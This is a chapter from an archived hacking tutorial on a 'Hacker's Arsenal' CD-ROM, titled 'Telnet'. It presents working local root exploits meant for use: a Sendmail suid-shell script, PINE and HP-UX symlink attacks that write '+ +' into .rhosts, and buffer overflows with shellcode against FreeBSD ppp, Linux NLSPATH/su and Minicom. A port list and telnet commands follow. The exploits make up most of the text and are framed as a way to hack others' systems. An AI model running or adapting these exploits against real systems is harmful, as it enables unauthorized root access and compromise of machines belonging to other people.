home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hacker's Arsenal - The Cutting Edge of Hacking
/
Hacker's Arsenal - The Cutting Edge of Hacking.iso
/
texts
/
chapter5.txt
< prev
next >
Wrap
Text File
|
2001-07-11
|
17KB
|
634 lines
Chapter 5: Telnet
Exploits and Telnet
Well exploits are the best way of hacking webpages but they are also more
complicated then hacking through ftp or using the phf. Before you can setup
an exploit you must first have a telnet proggie, there are many different
clients you can just do a netsearch and find everything you need.
It's best to get an account with your target(if possible) and view the
glitches from the inside out. Exploits expose errors or bugs in systems
and usually allow you to gain root access. There are many different
exploits around and you can view each seperately. I'm going to list a
few below but the list of exploits is endless.
This exploit is known as Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. This is how you
set it up:
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
and now on to another exploit. I'm going to display the pine exploit through
linux. By watching the process table with ps to see which users are running
PINE, one can then do an ls in /tmp/ to gather the lockfile names for each
user. Watching the process table once again will now reveal when each user
quits PINE or runs out of unread messages in their INBOX, effectively
deleting the respective lockfile.
Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts
(for a generic example) will cause PINE to create ~hamors/.rhosts as a
666 file with PINE's process id as its contents. One may now simply do
an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
This was writen by Sean B. Hamor...For this example, hamors is the victim
while catluvr is the attacker:
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
now on to another one, this will be the last one that I'm going to show.
Exploitation script for the ppp vulnerbility as described by no one to date,
this is NOT FreeBSD-SA-96:15. Works on
FreeBSD as tested. Mess with the numbers if it doesnt work. This is how
you set it up:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start
of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}
More exploits:
-Hpux
ppl exploit: #!/bin/ksh
# ppl exploit, second part - SOD 15Oct96
# not all buffer overruns need to force an address into the PC
# works on 10.X, too, oddly enough. - Script Junkie
#HOST='localhost'
#USER=`whoami`
HOST="+"
USER="+"
cd /tmp
rm core 2> /dev/null
ln -s ~root/.rhosts core
AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaa'
STUFF=`echo "${AAA}\n${HOST} ${USER}"`
ppl -o "${STUFF}"
rm core
remsh localhost -l root sh -i
schlowdishk exploit: #!/bin/ksh
# OK.. this bug gets inserted into remwatch after the patch.. It was there
# before in some versions, but now it's pretty much universal if the patch
# gets installed...
# Silly Scriptor & friend, SOD, (11Jun96)
if [ ! -x /usr/remwatch/bin/disks/showdisk ]
then
echo This is an exploit for the showdisk utility internal to
echo HP\'s Remote Watch series of programs.
echo The showdisk utility doesn\'t appear to be on your system.
echo Moo
exit
fi
FILE=$1
if [ -z "$FILE" ]
then
FILE=/.rhosts
fi
if [ -f "$FILE" ]
then
echo "Hey, there already a ${FILE}!"
echo "I'd rather enjoy making new files, thank you very much..."
exit
fi
umask 0000
/usr/remwatch/bin/disks/showdisk arg arg ${FILE} arg > /dev/null 2>&1
>${FILE}
ls -l ${FILE}
if [ "${FILE}" = "/.rhosts" ]
then
echo "Adding + + ..."
echo "+ +" >> /.rhosts
remsh localhost -l root ksh -i
fi
glance exploit: You need only do the following:
1. Log in as yourself.
2. Decide what file you want to create for world write.
3. do a umask 000
4. Then do /usr/perf/bin/glance -f <that_file>
5. After a few seconds, quit glance.
6. That file will now be there and world is writeable, now edit it.
7. If it previousle existed, it will be trunc'ed with orig perms.
sysdiag exploit: Basically, the sysdiag stuff is set-uid root. You can exploit that
feature to create and write stuff to arbitrary files on the system as
root,
while not being root. If the target file you want to create exists,
this
doesn't work. Perhaps there is a way around that, but that ain't the
point.
The point is that I used this to get root in 30 seconds on my HP's and
that's
not good. Heck, this is probably faster then asking for the root
password !!!
More on the problem:
What happens is that a feature exists to create a log file of your
sysdiag session that can be invoked while in the program. You give it
the
name of the file to create, and if it is a sym link to a non-existant
file,
sysdiag follows the sym link and creates the file as root for you and
logs
your session in it. To show a typical vunerability, I created /.rhosts
from a sym link in /tmp that sysdiag followed and then caused sysdiag
to
echo the line "+ +" in to the file. Then I could rlogin as root.
If /.rhosts or /etc/hosts.equiv don't exist, you can use this trick
to create and put a "+ +" in either of those files. That's an easy way
to
become root or someone else. You can do other files as well. This
ain't
cool, at all...
How I tested this on my system:
1. I logged in with my regular account
2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile
3. I ran the command: /bin/sysdiag
4. From the DUI> prompt I typed: outfile /tmp/f1
5. From the DUI> prompt I typed: + +
6. From the DUI> prompt I typed: redo
7. When my previous command echoed to the screen I pressed <return>.
8. From the DUI> prompt I typed: exit
9. Now at the shell prompt, and out of sysdiag, I typed:
rlogin localhost -l root
10. Once logged in I typed: id
and it said I was root...
This is the script of my sysdiag session:
Script started on Sat Sep 21 23:29:10 1996
$ id
uid=1648(jjacobi) gid=999(systems)
$ ls -l /tmp
total 0
$ ls -l /.rhosts
/.rhosts not found
$ ln -s /.rhosts /tmp/tempfile
$ ls -l /tmp
total 2
lrwx--x--x 1 jjacobi systems 8 Sep 21 23:29 tempfile ->
/.rhosts
$ ls -l /.rhosts
/.rhosts not found
$ /bin/sysdiag
sam exploit: Go to your HP 9.04/5 system first.
1. Log into your system as a normal user.
2. Compile the program below, making any changes if you need to. (you
shouldn't need to)
3. Log in on another terminal, become root and insure that sam is not
currently executing.
4. As the normal user log in, run the program that you compiled in step
2.
5. On the root log in session, run sam.
6. Look at the target file.
/* Code to exploit race of sam calling iopasrer.sh
It will usually cause the ioparser.sh script run
by root to follow the sym links created here to
create or truncate TARGET_FILENAME as root.
It ain't pretty and may not always work, but usually
does.
Compile on HP9000/[700/800] 9.04[5] with the command:
cc racer.c -o racer -Ae
*/
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <symlink.h>
#define PROC_TO_LOOK_FOR "sam" /* The process to look
for in ps */
#define TARGET_FILENAME "/check_this" /* File that is created or
trunc'ed */
#define NUM_SYM_LINKS 50 /* Increase this
for systems that fork() alot */
void main(void)
{
char ps_buf[65536]; /* ps data buffer */
char *line; /* a pointer in to the ps_buf */
char f1[80]; /* buffer space for the sym link name */
char hostname[32]; /* buffer space to hold hostname, duh */
int fd; /* fd is for the pipe */
int ext; /* the extantion to place on the
symlink (pid) */
int loop; /* Dumb loop variable,
suggestions ??? */
unlink("ps_fifo"); /* Why
not */
mkfifo("ps_fifo",S_IRUSR|S_IWUSR); /* Need this */
fd = open("ps_fifo",O_RDONLY|O_NONBLOCK); /* You read the pipe
*/
gethostname(hostname,32); /* gets the hostname just like
ioparser.sh !!! */
printf("Looking for process %s, will exploit filename
%s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);
/* FIGURE THE REST OUT YOURSELF, IT AIN'T ARTWORK... */
while(1) {
system("/bin/ps -u 0 > ps_fifo");
read(fd,ps_buf,65536);
if( (line = strstr(ps_buf,PROC_TO_LOOK_FOR)) != NULL ) {
while( *line != '\n' ) {
line--;
}
line+=2;
line[5] = '\0';
ext = atoi(line);
for(loop = 1 ; loop <= NUM_SYM_LINKS ; loop ++)
{
sprintf(f1,"/tmp/%s.%d",hostname,ext +
loop);
symlink(TARGET_FILENAME,f1);
}
while( (access(TARGET_FILENAME,F_OK)) < 0 );
printf("%s has run, wait a few seconds and check
%s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);
unlink("ps_fifo");
exit();
}
}
}
-Linux
nlspath exploit: /*
* NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
* Copyright (c) 1997 by Solar Designer
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() - 3072;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("NLSPATH", buffer, 1);
execl("/bin/su", "/bin/su", NULL);
}
--- nlspath.c ---
And the shellcode separately:
--- shellcode.s ---
.text
.globl shellcode
shellcode:
xorl %eax,%eax
movb $0x31,%al
int $0x80
xchgl %eax,%ebx
xorl %eax,%eax
movb $0x17,%al
int $0x80
.byte 0x68
popl %ecx
popl %eax
jmp *%ecx
call *%esp
xorl %eax,%eax
cltd
movl %ecx,%edi
movb $'/'-1,%al
incl %eax
scasb %es:(%edi),%al
jne -3
movl %edi,(%ecx)
movl %edx,4(%ecx)
movl %edi,%ebx
incl %eax
scasb %es:(%edi),%al
jne -3
movb %dl,-1(%edi)
movb $0x0B,%al
int $0x80
xorl %eax,%eax
incl %eax
xorl %ebx,%ebx
int $0x80
.byte '/'
.string "/bin/sh0"
Minicom 1.75 exploit: #include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdarg.h>
#define NOP 0x90
const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n";
extern code();
void dummy( void )
{
extern lbl();
/* do "exec( "/bin/sh" ); exit(0)" */
__asm__( "
code: xorl %edx, %edx
pushl %edx
jmp lbl
start2: movl %esp, %ecx
popl %ebx
movb %edx, 0x7(%ebx)
xorl %eax, %eax
movb $0xB, %eax
int $0x80
xorl %ebx, %ebx
xorl %eax, %eax
inc %eax
int $0x80
lbl: call start2
.string \"/bin/sh\"
");
}
void Fatal( int rv, const char *fmt, ... )
{
va_list vl;
va_start( vl, fmt );
vfprintf( stderr, fmt, vl );
va_end( vl );
exit( rv );
}
int main( int ac, char **av )
{
int buff_addr; /* where our code is */
int stack_offset = 0,
buffer_size = 0, i, code_size;
char *buffer, *p;
buff_addr = (int)(&buff_addr); /* get the stack pointer */
code_size = strlen( (char *)code ); /* get the size of piece of */
/* code in dummy() */
if( ac < 5 ) Fatal( -1, usage, *av );
buff_addr -= strtol( av[ 1 ], NULL, 0 );
buffer_size = strtoul( av[ 2 ], NULL, 0 );
if( buffer_size < code_size + 4 )
Fatal( -1, "buffer is too short -- %d minimum.\n", code_size + 5);
/* "this is supported, but not implemented yet" ;) */
if( (buffer = malloc( buffer_size )) == NULL )
Fatal( -1, "malloc(): %s\n", strerror( errno ) );
fprintf( stderr, "using buffer address 0x%8.8x\n", buff_addr );
for( i = buffer_size - 4; i > buffer_size / 2; i -= 4 )
*(int *)(buffer + i) = buff_addr;
memset( buffer, NOP, buffer_size/2 );
i = (buffer_size - code_size - 4)/2;
memcpy( buffer + i, (char *)code, code_size );
buffer[ buffer_size - 1 ] = '\0';
p = malloc( strlen( av[ ac - 1 ] ) + code_size + 1 );
if( !p )
Fatal( -1, "malloc(): %s\n", strerror( errno ) );
strcpy( p, av[ ac - 1 ] );
strcat( p, buffer );
av[ ac - 1 ] = p;
execve( av[ 3 ], av + 3, NULL );
perror( "exec():" );
}
I will send out more exploits in the next book I write.
Common Ports-
Program / Name Port
________________________________________________________________________
discard 9
netstat 15
chargen 19
ftp 21
telnetd 23
smtp 25
rlp 39
bootp 67
fingerk 79
http 80 / 8080
military http 80 / 8080 / 5580
link 87
pop3 110
identd 113
nntp 119
newsk 144
execk 512
login 513
pkill 515
ktalk 517
ntalk 518
netwall 533
rmontior 560
montior 561
kerberos 750
Common telnet commands:
Command Function
access Telnet account
c Connect to a host
cont Continue
d Disconnect
full Network echo
half Terminal echo
hangup Hangs up
mail Mail
set Select PAD parameters
stat Show network port.
telemail Mail